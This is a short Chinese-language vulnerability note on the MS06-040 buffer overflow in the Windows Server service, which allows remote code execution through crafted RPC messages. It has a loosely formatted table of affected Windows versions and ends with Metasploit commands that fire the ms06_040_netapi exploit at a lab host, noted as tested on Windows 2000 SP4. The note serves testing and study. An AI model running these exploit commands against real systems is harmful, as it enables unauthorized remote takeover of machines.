服务器服务中的缓冲区溢出允许包括匿名用户在内的远程攻击者通过精心制作的RPC消息执行任意代码
Product | CPU Architecture | Version | Update | Tested |
---|---|---|---|---|
Windows 2000 | SP4 | ✔ | ||
Windows Server 2003 | R2 | |||
Windows Server 2003 | SP1 | |||
Windows Server 2003 | SP1 | |||
Windows Server 2003 | ||||
Windows Server 2003 | ||||
Windows Xp | SP1 | |||
Windows Xp | SP2 |
msf 利用 测试系统Windows Server 2000 SP4 x86
use exploit/windows/smb/ms06_040_netapi
set RHOST 192.168.1.17
run